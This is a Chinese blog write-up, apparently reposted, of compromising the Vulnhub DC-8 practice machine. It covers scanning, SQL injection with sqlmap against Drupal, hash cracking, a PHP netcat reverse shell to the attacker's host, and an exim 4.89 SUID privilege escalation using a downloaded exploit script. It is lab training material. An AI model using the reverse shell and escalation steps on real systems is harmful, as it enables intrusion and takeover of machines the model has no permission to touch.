一、     环境搭建

Vulnhub上下载DC8

把它倒入vm虚拟机

二、     信息收集

虚拟机开kali直接nmap扫一扫本机的网段

 

发现了两个主机但是呢已经知道了128是本机ip那就是129了,开启了80和22端口然后直接去80看看

 

 

 

 

发现了网页那就先掏出dirsearch扫目录,扫出来很多就很舒服了

那就开始吧先挑重要的看,先是翻到了是Drupal cms然后就直接去搜漏洞利用了后面又翻到了一个登录,还有一个web.config,还有robots.txt写漏了

 

 

 

 

 

 这个站看着像是有注入,打了一发单引号就把路径爆出来了

那好吧那就直接sqlmap梭一把,简直没问题

 

 

 

账号密码有了刚刚的后台也有了那就冲冲,kali用john解密 Admin没解出来,john的密码为turtle,翻到了一个文件上传只能传图片那就先跳过再翻翻,烦得要死

 

 

 

翻到这里有一个写PHP代码的直接写一个反弹shell

<?php system("nc -e /bin/sh 192.168.101.128 1234")?>

顺便kali监听一下端口

 

使用python得到交互式shell

python -c "import pty;pty.spawn('/bin/bash')"

用find / -user root -perm -4000 -print 2>/dev/null查看使用有利用suid提权的命令发现exim4有root权限这可能是一个突破口(SUID可以让调用者以文件拥有者的身份运行该文件,所以我们利用SUID提权的思路就是运行root用户所拥有的SUID的文件,那么我们运行该文件的时候就得获得root用户的身份了。)

查看版本/usr/sbin/exim4 --version,版本为4.89

那就拿出msf使用searchsploit exim 4,查找到可以利用本地提权的方法

 

cp /usr/share/exploitdb/exploits/linux/local/46996.sh /home/root.sh,将利用脚本复制出来

把root.sh放/var/www/html下然后让靶机wget下载

 

 打开root.sh需要使用set ff=unix,使用unix换行符。不然就无法使用脚本

 

 然后把靶机切换到有写入权限的/tmp目录中中,使用wget命令下载root.sh提权脚本

 

然后给执行权限chmod 777 root.sh

./root.sh -m netcat和./root.sh -m setuid这两种方式看谁可以就谁

这有一个坑就是必须要转换格式,搞了半天真是服

shell脚本报错/bin/bash^M: bad interpreter: No such file or directory,通过查阅资料得知,shell脚本格式必须是unix才行

1.sed -i "s/r//" filename 或sed -i "s/^M//" filename,直接将回车符替换为空字符串。

2.vim filename,编辑文件,执行“: set ff=unix”,将文件设置为unix格式,然后执行“:wq”,保存退出。

3.dos2unix filename或busybox dos2unix filename,如果提示command not found,可以使用前两种方法。

 

 

 

拿下了,中途各种问题没有这么顺利

 

内容来源于网络如有侵权请私信删除

文章来源: 博客园

原文链接: https://www.cnblogs.com/hare9/p/15023998.html

你还没有登录,请先登录注册
  • 还没有人评论,欢迎说说您的想法!